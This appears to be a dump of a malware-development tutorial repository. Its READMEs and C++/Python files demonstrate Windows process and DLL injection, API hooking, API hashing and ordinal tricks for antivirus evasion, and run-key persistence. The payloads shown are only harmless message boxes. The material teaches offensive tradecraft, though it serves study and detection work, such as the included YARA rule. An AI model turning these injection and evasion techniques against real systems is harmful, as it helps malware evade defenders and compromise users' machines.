injection via alertable threads. C++ example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2021/11/22/malware-injection-5.html](https://cocomelonc.github.io/tutorial/2021/11/22/malware-injection-5.html) 6 | -------------------------------------------------------------------------------- /2021-11-22-malware-injection-5/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-11-22-malware-injection-5/hack.exe -------------------------------------------------------------------------------- /2021-11-23-malware-injection-6/README.md: -------------------------------------------------------------------------------- 1 | # Classic code injection via thread hijacking 2 | 3 | Simple code injection via thread hijacking instead create new one technique. C++ example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2021/11/23/malware-injection-6.html](https://cocomelonc.github.io/tutorial/2021/11/23/malware-injection-6.html) 6 | -------------------------------------------------------------------------------- /2021-11-23-malware-injection-6/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-11-23-malware-injection-6/hack.exe -------------------------------------------------------------------------------- /2021-11-24-malware-injection-7/README.md: -------------------------------------------------------------------------------- 1 | # C++ DLL injection via SetWindowsHookEx 2 | 3 | Simple classic DLL injection via SetWindowsHookEx. C++ malware example. 4 | -------------------------------------------------------------------------------- /2021-11-24-malware-injection-7/evil.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | evil.cpp 3 | simple DLL for DLL inject to process 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2021/11/25/malware-injection-7.html 6 | */ 7 | 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) { 12 | switch (nReason) { 13 | case DLL_PROCESS_ATTACH: 14 | break; 15 | case DLL_PROCESS_DETACH: 16 | break; 17 | case DLL_THREAD_ATTACH: 18 | break; 19 | case DLL_THREAD_DETACH: 20 | break; 21 | } 22 | return TRUE; 23 | } 24 | 25 | extern "C" __declspec(dllexport) int Meow() { 26 | MessageBox( 27 | NULL, 28 | "Meow from evil.dll!", 29 | "=^..^=", 30 | MB_OK 31 | ); 32 | return 0; 33 | } 34 | -------------------------------------------------------------------------------- /2021-11-24-malware-injection-7/evil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-11-24-malware-injection-7/evil.dll -------------------------------------------------------------------------------- /2021-11-24-malware-injection-7/hack.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | hack.cpp 3 | DLL inject via SetWindowsHookEx 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2021/11/25/malware-injection-7.html 6 | */ 7 | #include 8 | #include 9 | 10 | typedef int (__cdecl *MeowProc)(); 11 | 12 | int main(void) { 13 | HINSTANCE meowDll; 14 | MeowProc meowFunc; 15 | // load evil DLL 16 | meowDll = LoadLibrary(TEXT("evil.dll")); 17 | 18 | // get the address of exported function from evil DLL 19 | meowFunc = (MeowProc) GetProcAddress(meowDll, "Meow"); 20 | 21 | // install the hook - using the WH_KEYBOARD action 22 | HHOOK hook = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)meowFunc, meowDll, 0); 23 | Sleep(5*1000); 24 | UnhookWindowsHookEx(hook); 25 | 26 | return 0; 27 | } 28 | -------------------------------------------------------------------------------- /2021-11-24-malware-injection-7/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-11-24-malware-injection-7/hack.exe -------------------------------------------------------------------------------- /2021-11-26-malware-injection-8/README.md: -------------------------------------------------------------------------------- 1 | # Code injection to local process via Windows Fibers. 2 | 3 | Code injection to local process via Windows Fibers. Simple C++ malware code example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2021/11/28/malware-injection-8.html](https://cocomelonc.github.io/tutorial/2021/11/28/malware-injection-8.html) 6 | -------------------------------------------------------------------------------- /2021-11-26-malware-injection-8/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-11-26-malware-injection-8/hack.exe -------------------------------------------------------------------------------- /2021-11-30-basic-hooking-1/README.md: -------------------------------------------------------------------------------- 1 | # Windows API hooking example 2 | 3 | Simple code of "classic" 5-byte hooking technique. C++ example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2021/11/30/basic-hooking-1.html](https://cocomelonc.github.io/tutorial/2021/11/30/basic-hooking-1.html) 6 | -------------------------------------------------------------------------------- /2021-11-30-basic-hooking-1/cat.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | typedef int (__cdecl *CatProc)(LPCTSTR say); 4 | typedef int (__cdecl *BirdProc)(LPCTSTR say); 5 | 6 | int main(void) { 7 | HINSTANCE petDll; 8 | CatProc catFunc; 9 | BirdProc birdFunc; 10 | BOOL freeRes; 11 | 12 | petDll = LoadLibrary("pet.dll"); 13 | 14 | if (petDll != NULL) { 15 | catFunc = (CatProc) GetProcAddress(petDll, "Cat"); 16 | birdFunc = (BirdProc) GetProcAddress(petDll, "Bird"); 17 | if ((catFunc != NULL) && (birdFunc != NULL)) { 18 | (catFunc) ("meow-meow"); 19 | (catFunc) ("mmmmeow"); 20 | (birdFunc) ("tweet-tweet"); 21 | } 22 | freeRes = FreeLibrary(petDll); 23 | } 24 | 25 | return 0; 26 | } 27 | -------------------------------------------------------------------------------- /2021-11-30-basic-hooking-1/cat.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-11-30-basic-hooking-1/cat.exe -------------------------------------------------------------------------------- /2021-11-30-basic-hooking-1/example: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-11-30-basic-hooking-1/example -------------------------------------------------------------------------------- /2021-11-30-basic-hooking-1/example.asm: -------------------------------------------------------------------------------- 1 | ; just normal exit 2 | ; author @cocomelonc 3 | ; nasm -f elf32 -o example.o example.asm 4 | ; ld -m elf_i386 -o example example.o 5 | ; 32-bit linux 6 | 7 | section .data 8 | 9 | section .bss 10 | 11 | section .text 12 | global _start ; must be declared for linker 13 | 14 | ; normal exit 15 | _start: ; linker entry point 16 | xor eax, eax ; zero out eax 17 | push ebp 18 | mov ebp, esp 19 | push eax ; push NULL 20 | mov eax, 0x759279b0 ; call ExitProcess function addr in kernel32.dll 21 | jmp eax 22 | -------------------------------------------------------------------------------- /2021-11-30-basic-hooking-1/example.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-11-30-basic-hooking-1/example.o -------------------------------------------------------------------------------- /2021-11-30-basic-hooking-1/hooking.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-11-30-basic-hooking-1/hooking.exe -------------------------------------------------------------------------------- /2021-11-30-basic-hooking-1/hooking2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-11-30-basic-hooking-1/hooking2.exe -------------------------------------------------------------------------------- /2021-11-30-basic-hooking-1/pet.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-11-30-basic-hooking-1/pet.dll -------------------------------------------------------------------------------- /2021-12-03-inline-asm-1/hack.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | hack.cpp 3 | code inject via inline ASM 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2021/12/03/inline-asm-1.html 6 | */ 7 | #include 8 | #include 9 | 10 | int main() { 11 | printf("=^..^= meow-meow. You are hacked =^..^=\n"); 12 | asm(".byte 0x90,0x90,0x90,0x90\n\t" 13 | "ret \n\t"); 14 | return 0; 15 | } 16 | -------------------------------------------------------------------------------- /2021-12-03-inline-asm-1/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-12-03-inline-asm-1/hack.exe -------------------------------------------------------------------------------- /2021-12-06-malware-injection-9/README.md: -------------------------------------------------------------------------------- 1 | # DLL injection via NtCreateThreadEx. 2 | 3 | Simple DLL injection via undocumented NtCreateThreadEx. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2021/12/06/malware-injection-9.html](https://cocomelonc.github.io/tutorial/2021/12/06/malware-injection-9.html) 6 | -------------------------------------------------------------------------------- /2021-12-06-malware-injection-9/evil.c: -------------------------------------------------------------------------------- 1 | /* 2 | DLL example for DLL injection via NtCreateThreadEx 3 | author: @cocomelonc 4 | https://cocomelonc.github.io/pentest/2021/12/06/malware-injection-9.html 5 | */ 6 | 7 | #include 8 | #pragma comment (lib, "user32.lib") 9 | 10 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { 11 | switch (ul_reason_for_call) { 12 | case DLL_PROCESS_ATTACH: 13 | MessageBox( 14 | NULL, 15 | "Meow-meow!", 16 | "=^..^=", 17 | MB_OK 18 | ); 19 | break; 20 | case DLL_PROCESS_DETACH: 21 | break; 22 | case DLL_THREAD_ATTACH: 23 | break; 24 | case DLL_THREAD_DETACH: 25 | break; 26 | } 27 | return TRUE; 28 | } 29 | -------------------------------------------------------------------------------- /2021-12-06-malware-injection-9/evil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-12-06-malware-injection-9/evil.dll -------------------------------------------------------------------------------- /2021-12-06-malware-injection-9/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-12-06-malware-injection-9/hack.exe -------------------------------------------------------------------------------- /2021-12-06-malware-injection-9/mouse.c: -------------------------------------------------------------------------------- 1 | /* 2 | Victim process example for DLL injection via NtCreateThreadEx 3 | author: @cocomelonc 4 | https://cocomelonc.github.io/tutorial/2021/12/06/malware-injection-9.html 5 | */ 6 | 7 | #include 8 | #pragma comment (lib, "user32.lib") 9 | 10 | int main() { 11 | MessageBox(NULL, "Squeak-squeak!", "<:( )~~", MB_OK); 12 | return 0; 13 | } 14 | -------------------------------------------------------------------------------- /2021-12-06-malware-injection-9/mouse.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-12-06-malware-injection-9/mouse.exe -------------------------------------------------------------------------------- /2021-12-07-malware-injection-10/README.md: -------------------------------------------------------------------------------- 1 | # Code injection via NtAllocateVirtualMemory. 2 | 3 | Classic code injection via undocumented NtAllocateVirtualMemory. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2021/12/07/malware-injection-10.html](https://cocomelonc.github.io/tutorial/2021/12/07/malware-injection-10.html) 6 | -------------------------------------------------------------------------------- /2021-12-07-malware-injection-10/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-12-07-malware-injection-10/hack.exe -------------------------------------------------------------------------------- /2021-12-11-malware-injection-11/README.md: -------------------------------------------------------------------------------- 1 | # Code injection via NT API functions. 2 | 3 | Simple injection technique via NT API functions. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2021/12/11/malware-injection-11.html](https://cocomelonc.github.io/tutorial/2021/12/11/malware-injection-11.html) 6 | -------------------------------------------------------------------------------- /2021-12-11-malware-injection-11/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-12-11-malware-injection-11/hack.exe -------------------------------------------------------------------------------- /2021-12-13-malware-injection-12/README.md: -------------------------------------------------------------------------------- 1 | # Code injection via sections technique. 2 | 3 | Simple injection via NT API NtCreateSection, NtMapViewOfSection, RtlCreateUserThread functions. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2021/12/13/malware-injection-12.html](https://cocomelonc.github.io/tutorial/2021/12/13/malware-injection-12.html) 6 | -------------------------------------------------------------------------------- /2021-12-13-malware-injection-12/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-12-13-malware-injection-12/hack.exe -------------------------------------------------------------------------------- /2021-12-21-simple-malware-av-evasion-3/README.md: -------------------------------------------------------------------------------- 1 | # AV engines evasion techniques - part 3. 2 | 3 | AV engines evasion techniques and tricks: too much memory allocation, check machine resources, IsDebuggerPresent, check NUMA memory alllocate, etc. Simple C++ malware example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2021/12/25/simple-malware-av-evasion-3.html](https://cocomelonc.github.io/tutorial/2021/12/25/simple-malware-av-evasion-3.html) 6 | -------------------------------------------------------------------------------- /2021-12-21-simple-malware-av-evasion-3/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-12-21-simple-malware-av-evasion-3/hack.exe -------------------------------------------------------------------------------- /2021-12-21-simple-malware-av-evasion-3/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-12-21-simple-malware-av-evasion-3/hack2.exe -------------------------------------------------------------------------------- /2022-01-14-malware-injection-13/README.md: -------------------------------------------------------------------------------- 1 | # Code injection via ZwCreateSection (sections technique). 2 | 3 | Simple injection via NT API ZwCreateSection, NtMapViewOfSection, ZwCreateThreadEx functions. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/01/14/malware-injection-13.html](https://cocomelonc.github.io/tutorial/2022/01/14/malware-injection-13.html) 6 | 7 | -------------------------------------------------------------------------------- /2022-01-14-malware-injection-13/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-01-14-malware-injection-13/hack.exe -------------------------------------------------------------------------------- /2022-01-17-malware-injection-14/README.md: -------------------------------------------------------------------------------- 1 | # Code injection via memory sections and ZwQueueApcThread. 2 | 3 | Simple injection via NT API ZwCreateSection, NtMapViewOfSection, ZwQueueApcThread and ZwSetInformationThread functions. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/01/17/malware-injection-14.html](https://cocomelonc.github.io/tutorial/2022/01/17/malware-injection-14.html) 6 | 7 | -------------------------------------------------------------------------------- /2022-01-17-malware-injection-14/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-01-17-malware-injection-14/hack.exe -------------------------------------------------------------------------------- /2022-01-24-malware-injection-15/README.md: -------------------------------------------------------------------------------- 1 | # Code injection via KernelCallbackTable. 2 | 3 | Simple process injection by spoofing the `fnCOPYDATA` value in `KernelCallbackTable`. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/01/24/malware-injection-15.html](https://cocomelonc.github.io/tutorial/2022/01/24/malware-injection-15.html) 6 | 7 | -------------------------------------------------------------------------------- /2022-01-24-malware-injection-15/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-01-24-malware-injection-15/hack.exe -------------------------------------------------------------------------------- /2022-02-01-malware-injection-16/README.md: -------------------------------------------------------------------------------- 1 | # Process injection via RWX-memory hunting. 2 | 3 | Simple process injection by enum process, hunting RWX-memory and inject payload. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/02/01/malware-injection-16.html](https://cocomelonc.github.io/tutorial/2022/02/01/malware-injection-16.html) 6 | 7 | -------------------------------------------------------------------------------- /2022-02-01-malware-injection-16/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-02-01-malware-injection-16/hack.exe -------------------------------------------------------------------------------- /2022-02-07-mem-forensics-1/.gitignore: -------------------------------------------------------------------------------- 1 | /dump 2 | -------------------------------------------------------------------------------- /2022-02-07-mem-forensics-1/README.md: -------------------------------------------------------------------------------- 1 | # Basic memory forensics with Volatility. 2 | 3 | Simple memory forensics with Volatility. C++ malware example: process injection technique. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/02/07/mem-forensics-1.html](https://cocomelonc.github.io/tutorial/2022/02/07/mem-forensics-1.html) 6 | 7 | -------------------------------------------------------------------------------- /2022-02-07-mem-forensics-1/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-02-07-mem-forensics-1/hack.exe -------------------------------------------------------------------------------- /2022-02-15-malware-analysis-3/README.md: -------------------------------------------------------------------------------- 1 | # Malware analysis part 3. Threat hunting with Yara. 2 | 3 | Threat hunting via Yara rules. C++ malware example: classic process injection technique. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/02/15/malware-analysis-3.html](https://cocomelonc.github.io/tutorial/2022/02/15/malware-analysis-3.html) 6 | 7 | -------------------------------------------------------------------------------- /2022-02-15-malware-analysis-3/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-02-15-malware-analysis-3/hack.exe -------------------------------------------------------------------------------- /2022-02-15-malware-analysis-3/meow.yar: -------------------------------------------------------------------------------- 1 | rule meow { 2 | meta: 3 | author = "cocomelonc" 4 | category = "test" 5 | description = "test rule for meow-meow messagebox" 6 | 7 | strings: 8 | $a = "meow" 9 | $b = {4D 65 6F 77 2D 6D 65 6F 77} 10 | $mz = {4D 5A} 11 | 12 | condition: 13 | ($mz at 0x00) and ($a or $b) 14 | } 15 | -------------------------------------------------------------------------------- /2022-02-23-malware-analysis-4/README.md: -------------------------------------------------------------------------------- 1 | # Malware analysis part 4: VirusTotal API v3 2 | 3 | Simple python script for uploading file to VirusTotal via API v3 and get score. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/02/23/malware-analysis-4.html](https://cocomelonc.github.io/tutorial/2022/02/23/malware-analysis-4.html) 6 | -------------------------------------------------------------------------------- /2022-02-23-malware-analysis-4/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-02-23-malware-analysis-4/hack.exe -------------------------------------------------------------------------------- /2022-02-23-malware-analysis-4/requirements.txt: -------------------------------------------------------------------------------- 1 | requests==2.27.1 2 | -------------------------------------------------------------------------------- /2022-03-08-basic-hooking-2/README.md: -------------------------------------------------------------------------------- 1 | # Windows API hooking part 2. 2 | 3 | Simple Windows API hooking via `push, retn` technique. C++ implementation example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/03/08/basic-hooking-2.html](https://cocomelonc.github.io/tutorial/2022/03/08/basic-hooking-2.html) 6 | 7 | -------------------------------------------------------------------------------- /2022-03-08-basic-hooking-2/hooking.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-03-08-basic-hooking-2/hooking.exe -------------------------------------------------------------------------------- /2022-03-08-basic-hooking-2/pet.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-03-08-basic-hooking-2/pet.dll -------------------------------------------------------------------------------- /2022-03-14-malware-injection-17/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-03-14-malware-injection-17/hack.exe -------------------------------------------------------------------------------- /2022-03-14-malware-injection-17/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-03-14-malware-injection-17/hack2.exe -------------------------------------------------------------------------------- /2022-03-18-malware-av-evasion-4/README.md: -------------------------------------------------------------------------------- 1 | # AV engines evasion part 4. C++ example 2 | 3 | Simple trick with hide Windows API calls via ordinals. C++ implementation example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/03/18/simple-malware-av-evasion-4.html](https://cocomelonc.github.io/tutorial/2022/03/18/simple-malware-av-evasion-4.html) 6 | -------------------------------------------------------------------------------- /2022-03-18-malware-av-evasion-4/dll-def.py: -------------------------------------------------------------------------------- 1 | import pefile 2 | import sys 3 | import os.path 4 | 5 | dll = pefile.PE(sys.argv[1]) 6 | dll_basename = os.path.splitext(sys.argv[1])[0] 7 | 8 | try: 9 | with open(sys.argv[1].split("/")[-1].replace(".dll", ".def"), "w") as f: 10 | f.write("EXPORTS\n") 11 | for export in dll.DIRECTORY_ENTRY_EXPORT.symbols: 12 | if export.name: 13 | f.write('{}={}.{} @{}\n'.format(export.name.decode(), dll_basename, export.name.decode(), export.ordinal)) 14 | except: 15 | print ("failed to create .def file :(") 16 | else: 17 | print ("successfully create .def file :)") 18 | -------------------------------------------------------------------------------- /2022-03-18-malware-av-evasion-4/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-03-18-malware-av-evasion-4/hack.exe -------------------------------------------------------------------------------- /2022-03-18-malware-av-evasion-4/user32.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-03-18-malware-av-evasion-4/user32.dll -------------------------------------------------------------------------------- /2022-03-22-malware-av-evasion-5/README.md: -------------------------------------------------------------------------------- 1 | # AV engines evasion techniques - part 5. C++ malware implementation. 2 | 3 | Simple but efficient AV engines evasion technique - WinAPI functions call by hash. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/03/22/simple-av-evasion-5.html](https://cocomelonc.github.io/tutorial/2022/03/22/simple-av-evasion-5.html) 6 | -------------------------------------------------------------------------------- /2022-03-22-malware-av-evasion-5/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-03-22-malware-av-evasion-5/hack.exe -------------------------------------------------------------------------------- /2022-03-22-malware-av-evasion-5/meow.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main() { 4 | MessageBoxA(NULL, "Meow-meow!!", "=^..^=", MB_OK); 5 | return 0; 6 | } 7 | -------------------------------------------------------------------------------- /2022-03-22-malware-av-evasion-5/meow.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-03-22-malware-av-evasion-5/meow.exe -------------------------------------------------------------------------------- /2022-03-22-malware-av-evasion-5/myhash.py: -------------------------------------------------------------------------------- 1 | # simple stupid hashing example 2 | def myHash(data): 3 | hash = 0x35 4 | for i in range(0, len(data)): 5 | hash += ord(data[i]) + (hash << 1) 6 | print (hash) 7 | return hash 8 | 9 | myHash("MessageBoxA") 10 | -------------------------------------------------------------------------------- /2022-03-27-malware-analysis-5/classic.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-03-27-malware-analysis-5/classic.exe -------------------------------------------------------------------------------- /2022-03-27-malware-analysis-5/evil.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | evil.cpp 3 | simple DLL for DLL inject to process 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html 6 | */ 7 | 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) { 12 | switch (nReason) { 13 | case DLL_PROCESS_ATTACH: 14 | MessageBox( 15 | NULL, 16 | "Meow from evil.dll!", 17 | "=^..^=", 18 | MB_OK 19 | ); 20 | break; 21 | case DLL_PROCESS_DETACH: 22 | break; 23 | case DLL_THREAD_ATTACH: 24 | break; 25 | case DLL_THREAD_DETACH: 26 | break; 27 | } 28 | return TRUE; 29 | } 30 | -------------------------------------------------------------------------------- /2022-03-27-malware-analysis-5/evil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-03-27-malware-analysis-5/evil.dll -------------------------------------------------------------------------------- /2022-03-27-malware-analysis-5/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-03-27-malware-analysis-5/hack.exe -------------------------------------------------------------------------------- /2022-03-27-malware-analysis-5/myhash.py: -------------------------------------------------------------------------------- 1 | # simple stupid hashing example 2 | def myHash(data): 3 | hash = 0x35 4 | for i in range(0, len(data)): 5 | hash += ord(data[i]) + (hash << 1) 6 | print (data, hash) 7 | return hash 8 | 9 | myHash("VirtualAllocEx") 10 | myHash("WriteProcessMemory") 11 | myHash("CreateRemoteThread") 12 | myHash("OpenProcess") 13 | -------------------------------------------------------------------------------- /2022-04-02-malware-injection-18/README.md: -------------------------------------------------------------------------------- 1 | # Malware development tricks. Find kernel32dll base. C++ malware implementation. 2 | 3 | Find kernel32.dll base via going around PEB + WinAPI functions call by hash. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html](https://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html) 6 | -------------------------------------------------------------------------------- /2022-04-02-malware-injection-18/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-04-02-malware-injection-18/hack.exe -------------------------------------------------------------------------------- /2022-04-02-malware-injection-18/meow.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-04-02-malware-injection-18/meow.exe -------------------------------------------------------------------------------- /2022-04-02-malware-injection-18/myhash.py: -------------------------------------------------------------------------------- 1 | # simple stupid hashing example 2 | def myHash(data): 3 | hash = 0x35 4 | for i in range(0, len(data)): 5 | hash += ord(data[i]) + (hash << 1) 6 | print (hash) 7 | return hash 8 | 9 | myHash("kernel32.dll") 10 | myHash("GetModuleHandleA") 11 | myHash("GetProcAddress") 12 | -------------------------------------------------------------------------------- /2022-04-09-malware-av-evasion-6/README.md: -------------------------------------------------------------------------------- 1 | # AV engines evasion techniques - part 6. C++ malware implementation. 2 | 3 | Classic payload injection with VM virtualbox evasion tricks. Detect Oracle VirtualBox via Windows Registry. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/04/09/malware-av-evasion-6.html](https://cocomelonc.github.io/tutorial/2022/04/09/malware-av-evasion-6.html) 6 | -------------------------------------------------------------------------------- /2022-04-09-malware-av-evasion-6/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-04-09-malware-av-evasion-6/hack.exe -------------------------------------------------------------------------------- /2022-04-13-malware-injection-19/README.md: -------------------------------------------------------------------------------- 1 | # Malware development tricks. Download and inject. C++ malware implementation. 2 | 3 | Simple but efficient malware dev trick. Download payload/evil DLL and execute/inject. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/04/15/malware-injection-19.html](https://cocomelonc.github.io/tutorial/2022/04/15/malware-injection-19.html) 6 | -------------------------------------------------------------------------------- /2022-04-13-malware-injection-19/evil.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | evil.cpp 3 | simple DLL for DLL inject to process 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html 6 | */ 7 | 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) { 12 | switch (nReason) { 13 | case DLL_PROCESS_ATTACH: 14 | MessageBox( 15 | NULL, 16 | "Meow from evil.dll!", 17 | "=^..^=", 18 | MB_OK 19 | ); 20 | break; 21 | case DLL_PROCESS_DETACH: 22 | break; 23 | case DLL_THREAD_ATTACH: 24 | break; 25 | case DLL_THREAD_DETACH: 26 | break; 27 | } 28 | return TRUE; 29 | } 30 | -------------------------------------------------------------------------------- /2022-04-13-malware-injection-19/evil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-04-13-malware-injection-19/evil.dll -------------------------------------------------------------------------------- /2022-04-13-malware-injection-19/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-04-13-malware-injection-19/hack.exe -------------------------------------------------------------------------------- /2022-04-20-malware-pers-1/README.md: -------------------------------------------------------------------------------- 1 | # Malware development: persistence - part 1. C++ malware implementation. 2 | 3 | Simple but efficient malware persistence technique - via registry run keys. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html](https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html) 6 | -------------------------------------------------------------------------------- /2022-04-20-malware-pers-1/hack.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | meow-meow messagebox 3 | author: @cocomelonc 4 | */ 5 